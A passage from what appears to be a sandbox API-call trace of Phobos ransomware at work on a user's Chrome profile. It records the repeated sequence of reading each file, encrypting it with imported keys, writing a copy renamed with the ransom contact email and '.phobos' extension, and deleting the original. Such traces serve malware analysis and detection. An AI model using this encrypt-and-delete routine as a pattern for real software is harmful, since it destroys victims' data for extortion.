(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001")) returned 1 [0184.869] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.869] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=20480) returned 1 [0184.869] CloseHandle (hObject=0x178) returned 1 [0184.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons")) returned 0x2020 [0184.870] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.870] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.870] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.870] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.870] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.870] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5000, lpOverlapped=0x0) returned 1 [0184.896] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5010, dwBufLen=0x5010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5010) returned 1 [0184.896] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5010, lpOverlapped=0x0) returned 1 [0184.897] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.897] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.897] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0184.897] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.897] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0184.897] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.897] CloseHandle (hObject=0x178) returned 1 [0184.897] CloseHandle (hObject=0x134) returned 1 [0184.898] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons")) returned 1 [0184.898] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.899] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.899] CloseHandle (hObject=0x134) returned 1 [0184.899] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.899] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=176873) returned 1 [0184.900] CloseHandle (hObject=0x134) returned 1 [0184.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico")) returned 0x2020 [0184.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.900] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.900] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.900] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.900] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.901] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2b2e9, lpOverlapped=0x0) returned 1 [0184.921] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2b2f0, dwBufLen=0x2b2f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2b2f0) returned 1 [0184.923] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2b2f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2b2f0, lpOverlapped=0x0) returned 1 [0184.926] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0184.926] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.926] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0184.926] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.926] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0184.926] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.926] CloseHandle (hObject=0x134) returned 1 [0184.926] CloseHandle (hObject=0x178) returned 1 [0184.926] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico")) returned 1 [0184.928] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.928] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=102400) returned 1 [0184.928] CloseHandle (hObject=0x178) returned 1 [0184.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history")) returned 0x2020 [0184.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.929] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.929] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.929] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.929] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.929] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x19000, lpOverlapped=0x0) returned 1 [0184.946] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x19010, dwBufLen=0x19010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x19010) returned 1 [0184.948] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x19010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x19010, lpOverlapped=0x0) returned 1 [0184.950] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0184.950] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.950] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.950] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.950] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.950] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.950] CloseHandle (hObject=0x178) returned 1 [0184.950] CloseHandle (hObject=0x134) returned 1 [0184.950] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history")) returned 1 [0184.952] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.952] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5167) returned 1 [0184.952] CloseHandle (hObject=0x134) returned 1 [0184.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache")) returned 0x2020 [0184.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.953] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.953] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.953] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.953] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.953] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x142f, lpOverlapped=0x0) returned 1 [0184.955] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1430, dwBufLen=0x1430 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1430) returned 1 [0184.955] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1430, lpOverlapped=0x0) returned 1 [0184.956] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0184.956] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.956] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0184.956] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.956] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0184.956] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.956] CloseHandle (hObject=0x134) returned 1 [0184.956] CloseHandle (hObject=0x178) returned 1 [0184.957] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache")) returned 1 [0184.958] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.959] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.959] CloseHandle (hObject=0x178) returned 1 [0184.959] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A058.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a058.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.960] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.960] CloseHandle (hObject=0x178) returned 1 [0184.960] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\A059.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\a059.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.960] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.960] CloseHandle (hObject=0x178) returned 1 [0184.960] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.961] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.962] CloseHandle (hObject=0x178) returned 1 [0184.962] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.962] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.962] CloseHandle (hObject=0x178) returned 1 [0184.962] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.963] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16) returned 1 [0184.963] CloseHandle (hObject=0x178) returned 1 [0184.963] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current")) returned 0x2020 [0184.963] GetFileAttributesW 